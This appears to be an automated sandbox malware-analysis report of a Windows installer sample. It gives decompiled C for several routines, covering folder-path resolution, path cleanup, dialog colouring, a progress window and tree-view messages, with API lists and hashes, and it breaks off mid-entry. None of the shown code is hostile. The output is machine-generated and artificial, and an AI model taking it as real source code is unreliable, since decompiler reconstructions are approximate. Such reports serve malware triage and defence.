                                                              C-Code - Quality: 72%
                                                              			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                              				struct _ITEMIDLIST* _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _t44;
                                                              				WCHAR* _t45;
                                                              				signed char _t47;
                                                              				signed int _t48;
                                                              				short _t59;
                                                              				short _t61;
                                                              				short _t63;
                                                              				void* _t71;
                                                              				signed int _t77;
                                                              				signed int _t78;
                                                              				short _t81;
                                                              				short _t82;
                                                              				signed char _t84;
                                                              				signed int _t85;
                                                              				void* _t98;
                                                              				void* _t104;
                                                              				intOrPtr* _t105;
                                                              				void* _t107;
                                                              				WCHAR* _t108;
                                                              				void* _t110;
                                                              
                                                              				_t107 = __esi;
                                                              				_t104 = __edi;
                                                              				_t71 = __ebx;
                                                              				_t44 = _a8;
                                                              				if(_t44 < 0) {
                                                              					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                              				}
                                                              				_push(_t71);
                                                              				_push(_t107);
                                                              				_push(_t104);
                                                              				_t105 =  *0x42a298 + _t44 * 2;
                                                              				_t45 = 0x428200;
                                                              				_t108 = 0x428200;
                                                              				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                              					_t108 = _a4;
                                                              					_a4 = _a4 & 0x00000000;
                                                              				}
                                                              				_t81 =  *_t105;
                                                              				_a8 = _t81;
                                                              				if(_t81 == 0) {
                                                              					L43:
                                                              					 *_t108 =  *_t108 & 0x00000000;
                                                              					if(_a4 == 0) {
                                                              						return _t45;
                                                              					}
                                                              					return E00406668(_a4, _t45);
                                                              				} else {
                                                              					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                              						_t98 = 2;
                                                              						_t105 = _t105 + _t98;
                                                              						if(_t81 >= 4) {
                                                              							if(__eflags != 0) {
                                                              								 *_t108 = _t81;
                                                              								_t108 = _t108 + _t98;
                                                              								__eflags = _t108;
                                                              							} else {
                                                              								 *_t108 =  *_t105;
                                                              								_t108 = _t108 + _t98;
                                                              								_t105 = _t105 + _t98;
                                                              							}
                                                              							L42:
                                                              							_t82 =  *_t105;
                                                              							_a8 = _t82;
                                                              							if(_t82 != 0) {
                                                              								_t81 = _a8;
                                                              								continue;
                                                              							}
                                                              							goto L43;
                                                              						}
                                                              						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                              						_t47 =  *_t105;
                                                              						_t48 = _t47 & 0x000000ff;
                                                              						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                              						_t85 = _t84 & 0x000000ff;
                                                              						_v28 = _t48 | 0x00008000;
                                                              						_t77 = 2;
                                                              						_v16 = _t85;
                                                              						_t105 = _t105 + _t77;
                                                              						_v24 = _t48;
                                                              						_v20 = _t85 | 0x00008000;
                                                              						if(_a8 != _t77) {
                                                              							__eflags = _a8 - 3;
                                                              							if(_a8 != 3) {
                                                              								__eflags = _a8 - 1;
                                                              								if(__eflags == 0) {
                                                              									__eflags = (_t48 | 0xffffffff) - _v12;
                                                              									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                              								}
                                                              								L38:
                                                              								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                              								_t45 = 0x428200;
                                                              								goto L42;
                                                              							}
                                                              							_t78 = _v12;
                                                              							__eflags = _t78 - 0x1d;
                                                              							if(_t78 != 0x1d) {
                                                              								__eflags = (_t78 << 0xb) + 0x42b000;
                                                              								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                              							} else {
                                                              								E004065AF(_t108,  *0x42a268);
                                                              							}
                                                              							__eflags = _t78 + 0xffffffeb - 7;
                                                              							if(__eflags < 0) {
                                                              								L29:
                                                              								E004068EF(_t108);
                                                              							}
                                                              							goto L38;
                                                              						}
                                                              						if( *0x42a2e4 != 0) {
                                                              							_t77 = 4;
                                                              						}
                                                              						_t121 = _t48;
                                                              						if(_t48 >= 0) {
                                                              							__eflags = _t48 - 0x25;
                                                              							if(_t48 != 0x25) {
                                                              								__eflags = _t48 - 0x24;
                                                              								if(_t48 == 0x24) {
                                                              									GetWindowsDirectoryW(_t108, 0x400);
                                                              									_t77 = 0;
                                                              								}
                                                              								while(1) {
                                                              									__eflags = _t77;
                                                              									if(_t77 == 0) {
                                                              										goto L26;
                                                              									}
                                                              									_t59 =  *0x42a264;
                                                              									_t77 = _t77 - 1;
                                                              									__eflags = _t59;
                                                              									if(_t59 == 0) {
                                                              										L22:
                                                              										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                              										__eflags = _t61;
                                                              										if(_t61 != 0) {
                                                              											L24:
                                                              											 *_t108 =  *_t108 & 0x00000000;
                                                              											__eflags =  *_t108;
                                                              											continue;
                                                              										}
                                                              										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                              										_a8 = _t61;
                                                              										__imp__CoTaskMemFree(_v8);
                                                              										__eflags = _a8;
                                                              										if(_a8 != 0) {
                                                              											goto L26;
                                                              										}
                                                              										goto L24;
                                                              									}
                                                              									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                              									__eflags = _t63;
                                                              									if(_t63 == 0) {
                                                              										goto L26;
                                                              									}
                                                              									goto L22;
                                                              								}
                                                              								goto L26;
                                                              							}
                                                              							GetSystemDirectoryW(_t108, 0x400);
                                                              							goto L26;
                                                              						} else {
                                                              							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                              							if( *_t108 != 0) {
                                                              								L27:
                                                              								if(_v16 == 0x1a) {
                                                              									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                              								}
                                                              								goto L29;
                                                              							}
                                                              							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                              							L26:
                                                              							if( *_t108 == 0) {
                                                              								goto L29;
                                                              							}
                                                              							goto L27;
                                                              						}
                                                              					}
                                                              					goto L43;
                                                              				}
                                                              			}





























                                                              0x004066a5
                                                              0x004066a5
                                                              0x004066a5
                                                              0x004066ab
                                                              0x004066b0
                                                              0x004066c1
                                                              0x004066c1
                                                              0x004066c9
                                                              0x004066ca
                                                              0x004066cb
                                                              0x004066cc
                                                              0x004066cf
                                                              0x004066d7
                                                              0x004066d9
                                                              0x004066ea
                                                              0x004066ed
                                                              0x004066ed
                                                              0x004066f1
                                                              0x004066f7
                                                              0x004066fa
                                                              0x004068d5
                                                              0x004068d5
                                                              0x004068e0
                                                              0x004068ec
                                                              0x004068ec
                                                              0x00000000
                                                              0x00406700
                                                              0x00406705
                                                              0x0040671a
                                                              0x0040671b
                                                              0x00406721
                                                              0x004068b3
                                                              0x004068c1
                                                              0x004068c4
                                                              0x004068c4
                                                              0x004068b5
                                                              0x004068b8
                                                              0x004068bb
                                                              0x004068bd
                                                              0x004068bd
                                                              0x004068c6
                                                              0x004068c6
                                                              0x004068cc
                                                              0x004068cf
                                                              0x00406702
                                                              0x00000000
                                                              0x00406702
                                                              0x00000000
                                                              0x004068cf
                                                              0x00406727
                                                              0x0040672a
                                                              0x00406739
                                                              0x00406740
                                                              0x0040674c
                                                              0x0040674f
                                                              0x00406752
                                                              0x00406753
                                                              0x00406758
                                                              0x0040675e
                                                              0x00406761
                                                              0x00406764
                                                              0x00406857
                                                              0x0040685c
                                                              0x0040688f
                                                              0x00406894
                                                              0x00406899
                                                              0x0040689e
                                                              0x0040689e
                                                              0x004068a3
                                                              0x004068a9
                                                              0x004068ac
                                                              0x00000000
                                                              0x004068ac
                                                              0x0040685e
                                                              0x00406861
                                                              0x00406864
                                                              0x00406879
                                                              0x00406880
                                                              0x00406866
                                                              0x0040686d
                                                              0x0040686d
                                                              0x00406888
                                                              0x0040688b
                                                              0x0040684f
                                                              0x00406850
                                                              0x00406850
                                                              0x00000000
                                                              0x0040688b
                                                              0x00406771
                                                              0x00406775
                                                              0x00406775
                                                              0x00406776
                                                              0x00406778
                                                              0x004067b5
                                                              0x004067b8
                                                              0x004067c8
                                                              0x004067cb
                                                              0x004067d3
                                                              0x004067d9
                                                              0x004067d9
                                                              0x00406834
                                                              0x00406834
                                                              0x00406836
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dd
                                                              0x004067e2
                                                              0x004067e3
                                                              0x004067e5
                                                              0x004067fc
                                                              0x0040680a
                                                              0x00406810
                                                              0x00406812
                                                              0x00406830
                                                              0x00406830
                                                              0x00406830
                                                              0x00000000
                                                              0x00406830
                                                              0x00406818
                                                              0x00406821
                                                              0x00406824
                                                              0x0040682a
                                                              0x0040682e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040682e
                                                              0x004067f6
                                                              0x004067f8
                                                              0x004067fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004067fa
                                                              0x00000000
                                                              0x00406834
                                                              0x004067c0
                                                              0x00000000
                                                              0x0040677a
                                                              0x00406798
                                                              0x004067a1
                                                              0x0040683e
                                                              0x00406842
                                                              0x0040684a
                                                              0x0040684a
                                                              0x00000000
                                                              0x00406842
                                                              0x004067ab
                                                              0x00406838
                                                              0x0040683c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040683c
                                                              0x00406778
                                                              0x00000000
                                                              0x00406705

                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000), ref: 004068A4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Directory$SystemWindowslstrcatlstrlen
                                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4260037668-1514465523
                                                              • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                              • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                              • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                              • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                              				struct tagLOGBRUSH _v16;
                                                              				long _t39;
                                                              				long _t41;
                                                              				void* _t44;
                                                              				signed char _t50;
                                                              				long* _t54;
                                                              
                                                              				if(_a4 + 0xfffffecd > 5) {
                                                              					L18:
                                                              					return 0;
                                                              				}
                                                              				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                              					goto L18;
                                                              				} else {
                                                              					_t50 = _t54[5];
                                                              					if((_t50 & 0xffffffe0) != 0) {
                                                              						goto L18;
                                                              					}
                                                              					_t39 =  *_t54;
                                                              					if((_t50 & 0x00000002) != 0) {
                                                              						_t39 = GetSysColor(_t39);
                                                              					}
                                                              					if((_t54[5] & 0x00000001) != 0) {
                                                              						SetTextColor(_a8, _t39);
                                                              					}
                                                              					SetBkMode(_a8, _t54[4]);
                                                              					_t41 = _t54[1];
                                                              					_v16.lbColor = _t41;
                                                              					if((_t54[5] & 0x00000008) != 0) {
                                                              						_t41 = GetSysColor(_t41);
                                                              						_v16.lbColor = _t41;
                                                              					}
                                                              					if((_t54[5] & 0x00000004) != 0) {
                                                              						SetBkColor(_a8, _t41);
                                                              					}
                                                              					if((_t54[5] & 0x00000010) != 0) {
                                                              						_v16.lbStyle = _t54[2];
                                                              						_t44 = _t54[3];
                                                              						if(_t44 != 0) {
                                                              							DeleteObject(_t44);
                                                              						}
                                                              						_t54[3] = CreateBrushIndirect( &_v16);
                                                              					}
                                                              					return _t54[3];
                                                              				}
                                                              			}









                                                              0x0040463d
                                                              0x004046f3
                                                              0x00000000
                                                              0x004046f3
                                                              0x0040464e
                                                              0x00404652
                                                              0x00000000
                                                              0x0040466c
                                                              0x0040466c
                                                              0x00404675
                                                              0x00000000
                                                              0x00000000
                                                              0x00404677
                                                              0x00404683
                                                              0x00404686
                                                              0x00404686
                                                              0x0040468c
                                                              0x00404692
                                                              0x00404692
                                                              0x0040469e
                                                              0x004046a4
                                                              0x004046ab
                                                              0x004046ae
                                                              0x004046b1
                                                              0x004046b3
                                                              0x004046b3
                                                              0x004046bb
                                                              0x004046c1
                                                              0x004046c1
                                                              0x004046cb
                                                              0x004046d0
                                                              0x004046d3
                                                              0x004046d8
                                                              0x004046db
                                                              0x004046db
                                                              0x004046eb
                                                              0x004046eb
                                                              0x00000000
                                                              0x004046ee

                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                              • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                              • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E004068EF(WCHAR* _a4) {
                                                              				short _t5;
                                                              				short _t7;
                                                              				WCHAR* _t19;
                                                              				WCHAR* _t20;
                                                              				WCHAR* _t21;
                                                              
                                                              				_t20 = _a4;
                                                              				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                              					_t20 =  &(_t20[4]);
                                                              				}
                                                              				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                              					_t20 =  &(_t20[2]);
                                                              				}
                                                              				_t5 =  *_t20;
                                                              				_t21 = _t20;
                                                              				_t19 = _t20;
                                                              				if(_t5 != 0) {
                                                              					do {
                                                              						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                              							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                              							_t19 = CharNextW(_t19);
                                                              						}
                                                              						_t20 = CharNextW(_t20);
                                                              						_t5 =  *_t20;
                                                              					} while (_t5 != 0);
                                                              				}
                                                              				 *_t19 =  *_t19 & 0x00000000;
                                                              				while(1) {
                                                              					_push(_t19);
                                                              					_push(_t21);
                                                              					_t19 = CharPrevW();
                                                              					_t7 =  *_t19;
                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                              						break;
                                                              					}
                                                              					 *_t19 =  *_t19 & 0x00000000;
                                                              					if(_t21 < _t19) {
                                                              						continue;
                                                              					}
                                                              					break;
                                                              				}
                                                              				return _t7;
                                                              			}








                                                              0x004068f1
                                                              0x004068fa
                                                              0x00406911
                                                              0x00406911
                                                              0x00406918
                                                              0x00406924
                                                              0x00406924
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040692f
                                                              0x00406931
                                                              0x0040693a
                                                              0x0040693e
                                                              0x0040695b
                                                              0x00406963
                                                              0x00406963
                                                              0x00406968
                                                              0x0040696a
                                                              0x0040696d
                                                              0x00406972
                                                              0x00406973
                                                              0x00406977
                                                              0x00406977
                                                              0x00406978
                                                              0x0040697f
                                                              0x00406981
                                                              0x00406988
                                                              0x00000000
                                                              0x00000000
                                                              0x00406990
                                                              0x00406996
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406996
                                                              0x0040699b

                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                              • CharNextW.USER32(?,00000000,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                              • CharPrevW.USER32(?,?,76083420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-2977677972
                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040302E(intOrPtr _a4) {
                                                              				short _v132;
                                                              				long _t6;
                                                              				struct HWND__* _t7;
                                                              				struct HWND__* _t15;
                                                              
                                                              				if(_a4 != 0) {
                                                              					_t15 =  *0x420efc; // 0x0
                                                              					if(_t15 != 0) {
                                                              						_t15 = DestroyWindow(_t15);
                                                              					}
                                                              					 *0x420efc = 0;
                                                              					return _t15;
                                                              				}
                                                              				__eflags =  *0x420efc; // 0x0
                                                              				if(__eflags != 0) {
                                                              					return E00406A71(0);
                                                              				}
                                                              				_t6 = GetTickCount();
                                                              				__eflags = _t6 -  *0x42a26c;
                                                              				if(_t6 >  *0x42a26c) {
                                                              					__eflags =  *0x42a268;
                                                              					if( *0x42a268 == 0) {
                                                              						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                              						 *0x420efc = _t7;
                                                              						return ShowWindow(_t7, 5);
                                                              					}
                                                              					__eflags =  *0x42a314 & 0x00000001;
                                                              					if(( *0x42a314 & 0x00000001) != 0) {
                                                              						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                              						return E004056CA(0,  &_v132);
                                                              					}
                                                              				}
                                                              				return _t6;
                                                              			}







                                                              0x0040303d
                                                              0x0040303f
                                                              0x00403046
                                                              0x00403049
                                                              0x00403049
                                                              0x0040304f
                                                              0x00000000
                                                              0x0040304f
                                                              0x00403057
                                                              0x0040305d
                                                              0x00000000
                                                              0x00403060
                                                              0x00403067
                                                              0x0040306d
                                                              0x00403073
                                                              0x00403075
                                                              0x0040307b
                                                              0x004030b9
                                                              0x004030c2
                                                              0x00000000
                                                              0x004030c7
                                                              0x0040307d
                                                              0x00403084
                                                              0x00403095
                                                              0x00000000
                                                              0x004030a3
                                                              0x00403084
                                                              0x004030cf

                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                              • wsprintfW.USER32 ref: 00403095
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsi821.tmp\System.dll), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(00039AD6,00000064,0003A12D), ref: 00403027
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                              • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                              • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                              • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                              				long _v8;
                                                              				signed char _v12;
                                                              				unsigned int _v16;
                                                              				void* _v20;
                                                              				intOrPtr _v24;
                                                              				long _v56;
                                                              				void* _v60;
                                                              				long _t15;
                                                              				unsigned int _t19;
                                                              				signed int _t25;
                                                              				struct HWND__* _t28;
                                                              
                                                              				_t28 = _a4;
                                                              				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                              				if(_a8 == 0) {
                                                              					L4:
                                                              					_v56 = _t15;
                                                              					_v60 = 4;
                                                              					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                              					return _v24;
                                                              				}
                                                              				_t19 = GetMessagePos();
                                                              				_v16 = _t19 >> 0x10;
                                                              				_v20 = _t19;
                                                              				ScreenToClient(_t28,  &_v20);
                                                              				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                              				if((_v12 & 0x00000066) != 0) {
                                                              					_t15 = _v8;
                                                              					goto L4;
                                                              				}
                                                              				return _t25 | 0xffffffff;
                                                              			}














                                                              0x00404f8d
                                                              0x00404f9a
                                                              0x00404fa0
                                                              0x00404fde
                                                              0x00404fde
                                                              0x00404fed
                                                              0x00404ff4
                                                              0x00000000
                                                              0x00404ff6
                                                              0x00404fa2
                                                              0x00404fb1
                                                              0x00404fb9
                                                              0x00404fbc
                                                              0x00404fce
                                                              0x00404fd4
                                                              0x00404fdb
                                                              0x00000000
                                                              0x00404fdb
                                                              0x00000000

                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                              • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                              Strings
                                                              Memory Dump Source
